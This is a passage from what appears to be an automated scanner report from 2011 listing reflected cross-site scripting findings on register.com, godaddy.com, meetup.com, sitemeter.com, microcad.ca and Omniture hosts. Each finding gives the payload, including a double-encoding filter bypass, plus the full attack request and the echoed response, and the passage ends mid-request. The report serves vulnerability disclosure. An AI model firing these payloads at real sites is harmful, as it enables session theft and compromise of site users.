User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 190
Date: Sat, 03 Sep 2011 14:45:51 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: eventdcde1<img src=a onerror=alert(1)>f66f189a6f5', 0).setOffer(new mboxOfferDefault()).loaded();}

4.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload f1e2b<script>alert(1)</script>3ebb60b60ec was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0f1e2b<script>alert(1)</script>3ebb60b60ec&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 187
Date: Sat, 03 Sep 2011 14:45:53 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0f1e2b<script>alert(1)</script>3ebb60b60ec).setOffer(new mboxOfferDefault()).loaded();}

4.5. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ba731<img%20src%3da%20onerror%3dalert(1)>a045854fac4 was submitted in the mbox parameter. This input was echoed as ba731<img src=a onerror=alert(1)>a045854fac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20eventba731<img%20src%3da%20onerror%3dalert(1)>a045854fac4&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sat, 03 Sep 2011 21:36:20 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: eventba731<img src=a onerror=alert(1)>a045854fac4', 0).setOffer(new mboxOfferDefault()).loaded();}

4.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 91a71<script>alert(1)</script>a4eda9bdaf was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=091a71<script>alert(1)</script>a4eda9bdaf&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 260
Date: Sat, 03 Sep 2011 21:36:30 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: event', 091a71<script>alert(1)</script>a4eda9bdaf).setOffer(new mboxOfferDefault()).loaded();}

4.7. http://s29.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s29.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d44ca'%3balert(1)//d4128f40f21 was submitted in the site parameter. This input was echoed as d44ca';alert(1)//d4128f40f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=s29fjgruberd44ca'%3balert(1)//d4128f40f21 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruberd44ca';alert(1)//d4128f40f21', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruberd44ca';alert(1)//d4128f40f21';
// ]]>
...[SNIP]...

4.8. http://s29.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s29.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 880a1'%3balert(1)//032b9cc3e90 was submitted in the site parameter. This input was echoed as 880a1';alert(1)//032b9cc3e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s29fjgruber880a1'%3balert(1)//032b9cc3e90 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruber880a1';alert(1)//032b9cc3e90', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruber880a1';alert(1)//032b9cc3e90';
// ]]>
...[SNIP]...

4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /external/json/PcSetData.aspx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5f83<script>alert(1)</script>ad6c14f1643 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/json/PcSetData.aspx?ci=17368&callback=pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643&pcj_setdata=jsonp1315085571645&_=1315085571848 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; traffic=referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault&server=M1PWCORPWEB109&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/javascript; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:19 GMT
Content-Length: 71

pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643({"Error":"Error"})

4.10. http://www.meetup.com/api/ [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /api/

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3 was submitted in the method parameter. This input was echoed as 94cc7<img src=a onerror=alert(1)>74359147cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/?method=getAlertTopicStats94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3&arg_topicId=381&arg_lat=42.37&arg_lon=-71.09&arg_radius=50&arg_zip=02142&arg_country=us&arg_language=en_US HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien

Response

HTTP/1.1 403 Forbidden
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app16.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 112
Connection: close

{"UNKNOWN":"[BAD METHOD] Can't find method \"getAlertTopicStats94cc7<img src=a onerror=alert(1)>74359147cc3\"."}

4.11. http://www.microcad.ca/cart/add/ [productid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.microcad.ca
Path:   /cart/add/

Issue detail

The value of the productid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36039%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6607268138f was submitted in the productid parameter. This input was echoed as 36039'><script>alert(1)</script>6607268138f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the productid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=101195676036039%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6607268138f

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18701
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/101195676036039'><script>alert(1)</script>6607268138f'>
...[SNIP]...

4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/home-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ae9"%3balert(1)//903e1a040cb was submitted in the REST URL parameter 1. This input was echoed as 59ae9";alert(1)//903e1a040cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css59ae9"%3balert(1)//903e1a040cb/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:56 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/css59ae9";alert(1)//903e1a040cb/home-optimized.css",width:400,height:400 }
</script>
...[SNIP]...

4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87eb"%3balert(1)//6208eb93c15 was submitted in the REST URL parameter 1. This input was echoed as e87eb";alert(1)//6208eb93c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domaine87eb"%3balert(1)//6208eb93c15/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:06 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domaine87eb";alert(1)//6208eb93c15/searchresults.rcmx",width:400,height:400 }
</script>
...[SNIP]...

4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c08de"%3balert(1)//874342fb6c6 was submitted in the REST URL parameter 2. This input was echoed as c08de";alert(1)//874342fb6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/searchresults.rcmxc08de"%3balert(1)//874342fb6c6?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
